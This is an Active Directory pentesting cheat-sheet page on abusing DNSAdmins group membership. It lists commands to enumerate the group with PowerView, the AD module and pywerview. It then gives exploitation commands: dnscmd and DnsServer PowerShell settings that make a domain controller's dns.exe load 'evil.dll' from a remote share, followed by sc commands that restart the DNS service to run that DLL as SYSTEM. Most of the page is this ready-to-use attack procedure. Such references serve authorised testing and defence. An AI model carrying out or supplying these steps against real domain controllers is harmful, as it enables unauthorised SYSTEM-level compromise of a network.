DNS Administrators

DNS Administrators have the ability to load arbitrary DLL's using dns.exe. Since dns.exe runs as system, you can run commands through that dll as system.

You will need the privileges necessary to restart the DNS service to conduct this attack.

Attacking DNS Admins

Enumerate DNS Admins

# PowerView
Get-NetGroupMember -GroupName "DNSAdmins"

#Ad Module
Get-ADGroupMember -Identity "DNSAdmins"

From Linux

# pywerview.py
./pywerview.py get-netgroupmember -u <user> -p <pass> --dc-ip <ip> --groupname "DNSAdmins"

Exploitation

With the privileges of a DNS Admin, configure the DLL using dnscmd.exe (requires RSAT DNS).

Host a dll on a share and use it as a plugin

# using dnscmd.exe
dnscmd dcorp-dc /config /serverlevelplugindll \\<share_ip>\dll\evil.dll 

# using DNSServer Module
$dnsettings = Get-DnsServerSetting -ComputerName <dc> -Verbose -All

$dnsettings.ServerLevelPluginDll = "\\<share_ip>\dll\evil.dll"

Set-DnsServerSetting -InputObject $dnsettings -ComputerName <dc> -Verbose

Then restart the DNS service and await what you expect from the DLL.

sc \\<dc> stop dns
sc \\<dc> start dns

PreviousKerberoasting NextSetting Object SPN's

Last updated 2 years ago